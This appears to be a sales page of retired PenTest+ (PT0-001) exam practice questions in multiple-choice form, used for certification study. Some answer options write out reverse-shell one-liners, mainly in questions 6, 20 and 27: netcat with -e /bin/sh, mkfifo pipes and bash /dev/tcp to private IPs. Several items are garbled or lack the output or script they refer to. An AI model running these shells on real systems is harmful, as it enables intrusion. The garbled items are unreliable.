Summer Sale - Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dpt65

PT0-001 Questions and Answers

Note! Following PT0-001 Exam is Retired now. Please select the alternative replacement for your Exam Certification. The new exam code is PT0-002

PT0-001 Questions and Answers

Question # 6

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

A.

nc 192.168.1.5 44444

B.

nc -nlvp 4444 -e /bin/sh

C.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 44444>/tmp /f

D.

nc -e /bin/sh 192.168.1.5 4444

E.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 444444>/tmp /f

F.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.5.1 44444>/tmp /f

Full Access
Question # 7

After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

A.

cat enum41inux_output.txt > grep -v user I sed ‘s/\[//' I sed ‘s/\]//' 2> usernames.txt

B.

grep user enuza41inux_output.txt I awk '{print $1}' | cut -d[ -£2 I cut -d] -f1 > username.txt

C.

grep -i rid v< enura.41inux_output. txt' | cut -d: -£2 i cut -d] -f1 > usernames. txt

D.

cut -d: -f2 enum41inux_output.txt | awk '{print S2}' I cut -d: -f1 > usernaraes.txt

Full Access
Question # 8

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A.

Download the GHOST file to a Linux system and compilegcc -o GHOSTtest i:./GHOST

B.

Download the GHOST file to a Windows system and compilegcc -o GHOST GHOST.ctest i:./GHOST

C.

Download the GHOST file to a Linux system and compilegcc -o GHOST.ctest i:./GHOST

D.

Download the GHOST file to a Windows system and compilegcc -o GHOSTtest i:./GHOST

Full Access
Question # 9

During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical

business function. Which of the following mitigations is BEST for the consultant to conduct?

A.

Update to the latest Microsoft Windows OS.

B.

Put the machine behind the WAF.

C.

Segment the machine from the main network.

D.

Disconnect the machine.

Full Access
Question # 10

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd

Which of the following attack types is MOST likely to be the vulnerability?

A.

Directory traversal

B.

Cross-site scripting

C.

Remote file inclusion

D.

User enumeration

Full Access
Question # 11

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A.

schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run

B.

net session server | dsquery -user | net use c$

C.

powershell && set-executionpolicy unrestricted

D.

reg save HKLM\System\CurrentControlSet\Services\Sv.reg

Full Access
Question # 12

A client gives a penetration tester a /8 network range to scan during a week-long engagement. Which of the following tools would BEST complete this task quickly?

A.

Massscan

B.

Nmap

C.

Angry IP scanner

D.

Unicorn scan

Full Access
Question # 13

A client has scheduled a wireless penetration test. Which of the following describes the scoping target

information MOST likely needed before testing can begin?

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Full Access
Question # 14

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions

during ingest into a Windows application. Before beginning to test the application, which of the following should

the assessor request from the organization?

A.

Sample SOAP messages

B.

The REST API documentation

C.

A protocol fuzzing utility

D.

An applicable XSD file

Full Access
Question # 15

After successfully capturing administrator credentials to a remote Windows machine, a penetration tester attempts to access the system using PSExec but is denied permission. Which of the following shares must be accessible for a successful PSExec connection?

A.

IPCS and C$

B.

C$ and ADMINS

C.

SERVICES and ADMINS

D.

ADMINS and IPCS

Full Access
Question # 16

A client’s systems administrator requests a copy of the report from the penetration tester, but the systems

administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester’s

BEST course of action?

A.

Send the report since the systems administrator will be in charge of implementing the fixes.

B.

Send the report and carbon copy the point of contact/signatory for visibility.

C.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

D.

Forward the request to the point of contact/signatory for authorization.

Full Access
Question # 17

A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in QUESTION NO: within the last 30 minutes. Which of the following has MOST likely occurred?

A.

The badge was cloned.

B.

The physical access control server is malfunctioning.

C.

The system reached the crossover error rate.

D.

The employee lost the badge.

Full Access
Question # 18

A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the

login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following

threat actors will be emulated?

A.

APT

B.

Hacktivist

C.

Script kiddie

D.

Insider threat

Full Access
Question # 19

A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have

helped the penetration tester identify this vulnerability?

A.

‘or ‘folder’ like ‘file’; ––

B.

|| is /tmp/

C.

“>

D.

&& dir C:/

E.

../../../../../../../../

Full Access
Question # 20

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

A.

nc -l -p 4444 /bin/bash

B.

nc -vp 4444 /bin/bash

C.

nc -p 4444 /bin/bash

D.

nc -lp 4444 -e /bin/bash

Full Access
Question # 21

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

A.

dsrm -users "DN=compony.com; OU=hq CN=usera"

B.

dsuser -name -account -limit 3

C.

dsquery uaer -inactive 3

D.

dsquery -o -rein -limit 21

Full Access
Question # 22

After delivering a draft of a penetration test report, a development team has raised concerns about an issue categorized as "high." A cloud storage bucket is configured to allow read access to the public, but writing to objects within the bucket is restricted to authorized users. The bucket contains only publicly available images that can already be found on the application homepage. Which of the following severity levels should the penetration tester consider?

A.

Critical

B.

Medium

C.

Informational

D.

Low

Full Access
Question # 23

A penetration tester has gained a root shell on a target Linux server and wants to have the server "check in" over HTTP using a GET request to the penetration tester's laptop once every hour, even after system reboots. The penetration tester wrote a bash script to perform this. Which of the following represents the BEST method to persist the script?

A.

Execute the script to run in a screen session.

B.

Use the nohup command to launch the script immune to logouts.

C.

Configure a systemd service at default run level to launch the script.

D.

Modify .bash_profile to launch the script in the background.

Full Access
Question # 24

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

A.

Common libraries

B.

Configuration files

C.

Sandbox escape

D.

ASLR bypass

Full Access
Question # 25

A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

A)

B)

C)

D)

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Full Access
Question # 26

A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

A.

Subject key identifier

B.

Subject alternative name

C.

Authority information access

D.

Service principal name

Full Access
Question # 27

The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?

A.

Performs a port scan.

B.

Grabs the web server's banner.

C.

Redirects a TTY to a remote system.

D.

Removes error logs for the supplied IP.

Full Access
Question # 28

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A.

nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B.

nslookup -ns 8.8.8.8 << dnslist.txt

C.

for x in (1…254); do dig -x 192.168. $x. $x; done

D.

dig -r > echo “8.8.8.8” >> /etc/resolv/conf

Full Access
Question # 29

An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate

the application’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The

application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely

preventing proxying of all traffic?

A.

Misconfigured routes

B.

Certificate pinning

C.

Strong cipher suites

D.

Closed ports

Full Access
Question # 30

Given the following Python script:

Which of the following actions will it perform?

A.

ARP spoofing

B.

Port scanner

C.

Reverse shell

D.

Banner grabbing

Full Access
Question # 31

Which of the following is the purpose of an NDA?

A.

Outlines the terms of confidentiality between both parties

B.

Outlines the boundaries of which systems are authorized for testing

C.

Outlines the requirements of technical testing that are allowed

D.

Outlines the detailed configuration of the network

Full Access
Question # 32

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

A.

Karma attack

B.

Deauthentication attack

C.

Fragmentation attack

D.

SSDI broadcast flood

Full Access
Question # 33

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

A.

Expand the password length from seven to 14 characters

B.

Implement password history restrictions

C.

Configure password filters

D.

Disable the accounts after five incorrect attempts

E.

Decrease the password expiration window

Full Access
Question # 34

Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

A.

Mimikatz

B.

BeEF

C.

Nikto

D.

Patator

Full Access
Question # 35

Performance based

You are a penetration Inter reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

Full Access
Question # 36

A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

A.

DNS cache poisoning

B.

Record and replay

C.

Supervisory server SMB

D.

Blind SQL injection

Full Access
Question # 37

A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

A.

Insider threat

B.

Nation state

C.

Script kiddie

D.

Cybercrime organization.

Full Access
Question # 38

A software developer wants to test the code of an application for vulnerabilities. Which of the following

processes should the software developer perform?

A.

Vulnerability scan

B.

Dynamic scan

C.

Static scan

D.

Compliance scan

Full Access
Question # 39

A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester

to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete

after the tester delivers the report?

A.

Removing shells

B.

Obtaining client acceptance

C.

Removing tester-created credentials

D.

Documenting lessons learned

E.

Presenting attestation of findings

Full Access
Question # 40

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?

A.

Elicitation attack

B.

Impersonation attack

C.

Spear phishing attack

D.

Drive-by download attack

Full Access
Question # 41

An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?

A.

Ensure all protocols are using encryption.

B.

Employ network ACLs.

C.

Disable source routing on the server.

D.

Ensure the IDS rules have been updated.

Full Access
Question # 42

A penetration tester has successfully exploited a vulnerability on an organization’s authentication server and

now wants to set up a reverse shell. The penetration tester finds that Netcat is not available on the target.

Which of the following approaches is a suitable option to attempt NEXT?

A.

Run xterm to connect to the X-server of the target.

B.

Attempt to escalate privileges to acquire an interactive shell.

C.

Try to use the /dev/tcp socket.

D.

Attempt to read out/etc/shadow.

Full Access
Question # 43

D18912E1457D5D1DDCBD40AB3BF70D5D

Which of the following is the MOST comprehensive type of penetration test on a network?

A.

Black box

B.

White box

C.

Gray box

D.

Red team

E.

Architecture review

Full Access
Question # 44

A penetration tester is connected to a client’s local network and wants to passively identify cleartext protocols

and potentially sensitive data being communicated across the network. Which of the following is the BEST

approach to take?

A.

Run a network vulnerability scan.

B.

Run a stress test.

C.

Run an MITM attack.

D.

Run a port scan.

Full Access